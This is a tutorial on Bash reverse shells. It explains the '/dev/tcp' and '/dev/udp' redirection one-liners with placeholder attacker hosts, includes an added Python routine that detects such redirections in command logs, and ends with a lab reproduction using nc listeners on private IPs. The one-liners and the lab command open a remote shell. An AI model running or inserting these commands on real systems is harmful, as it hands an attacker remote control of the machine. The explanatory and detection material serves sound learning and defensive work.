Bash reverse shell
Introduction to Bash
The shell, also known as the terminal, is the translator between users and the kernel, and Bash is the default shell used in Linux.
Bash reverse shell commands are as follows:
bash -i >&/dev/tcp/attacker_IP/attacker_port 0>&1
bash -i >&/dev/tcp/attacker_IP/attacker_port 0>&2
bash -i >&/dev/udp/attacker_IP/attacker_port 0>&1
bash -i >&/dev/udp/attacker_IP/attacker_port 0>&2
Next, we break these commands down step by step and explain each part in detail.
"bash -i" opens an interactive shell.
The "&" symbol distinguishes file descriptors from files. When ">&" is followed by a file, standard output and standard error are both redirected to that file. When ">&" is followed by a number, that number is a file descriptor; without the "&", the number would be treated as a file name. The numbers "0", "1" and "2" are file descriptors in the Linux shell: "0" is standard input, "1" is standard output, and "2" is standard error.
"tcp" and "udp" in the "/dev" directory are special devices in Linux that can be used to establish a socket connection; reading and writing these two files is equivalent to transmitting data over a socket connection. ">&/dev/tcp/attacker_IP/attacker_port" redirects standard output and standard error to the "/dev/tcp/attacker_IP/attacker_port" file, that is, to the attacking machine, so the results of commands executed on the target machine can be seen on the attacking machine. "0>&1" or "0>&2" redirects standard input to the same place; since standard output and standard error are already redirected to the attacking machine, standard input is redirected there as well, so commands can be entered from the attacking machine and their output seen there.
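For defenders, the redirection rules described above translate directly into a detection check. The following is an added example, not part of the original post: it traces where descriptors 0, 1 and 2 end up for a logged command line and flags lines that put a shell's input and output on a /dev/tcp or /dev/udp path. The function names, the sample lines and the 192.0.2.10 address are constructed for illustration.

```python
import re

# One redirection: optional fd number (only at a word start), operator, target word.
REDIR = re.compile(r"""((?<![^\s;|&])\d+)?(&>|>&|<&|<>|>>|>|<)\s*([^\s;|&<>'"]+)""")
SOCKET = re.compile(r"^/dev/(tcp|udp)/([^/]+)/([^/]+)$")

def trace_fds(cmdline):
    """Apply redirections left to right, as Bash does, and return {fd: target}.
    Simplification: the whole line is treated as one simple command."""
    fds = {0: "tty", 1: "tty", 2: "tty"}
    for fd, op, target in REDIR.findall(cmdline):
        if op == "&>" or (op == ">&" and not fd and not target.isdigit()):
            fds[1] = fds[2] = target                     # ">&file": stdout and stderr
        elif op in (">&", "<&") and target.isdigit():
            dest = int(fd) if fd else (1 if op == ">&" else 0)
            fds[dest] = fds.get(int(target), "closed")   # "0>&1": copy descriptor 1
        else:
            fds[int(fd) if fd else (0 if op[0] == "<" else 1)] = target
    return fds

def classify(cmdline):
    """Return None, or a summary of which descriptors end up on a socket path."""
    hits = {fd: SOCKET.match(t).groups()
            for fd, t in trace_fds(cmdline).items() if SOCKET.match(t)}
    if not hits:
        return None
    proto, host, port = next(iter(hits.values()))
    interactive = {0, 1}.issubset(hits)   # commands in and results out over the socket
    return {"proto": proto, "host": host, "port": port, "fds": sorted(hits),
            "verdict": "shell I/O on socket" if interactive else "socket redirect"}

# Constructed command lines, as a process-creation log might record them.
SAMPLES = [
    "bash -i >&/dev/tcp/192.0.2.10/9999 0>&1",
    "sh -c 'bash -i >& /dev/udp/192.0.2.10/9999 0>&2'",
    "exec 3<>/dev/tcp/192.0.2.10/80",
    "ls -l /dev/tcp 2>&1 >listing.txt",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(classify(line), "<-", line)
```

Because redirections are applied in order, a line such as "bash -i 0>&1 >&/dev/tcp/192.0.2.10/9999" leaves standard input on the terminal and is reported only as a socket redirect.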
Introduction to Experimental Environment
Experimental topology
Machine name | IP | System |
---|---|---|
Attack machine | 192.168.41.130 | Windows |
Server | 192.168.41.132 | Kali |
Experimental reproduction
The attacking machine uses nc to run the listening command:
# Listen on TCP
nc64.exe -lvvp 9999
# Listen on UDP
nc64.exe -lup 9999
The experimental server executes the connection command:
bash -i >&/dev/tcp/192.168.41.130/9999 0>&1
Checking the results, we find that we have successfully obtained the target server IP.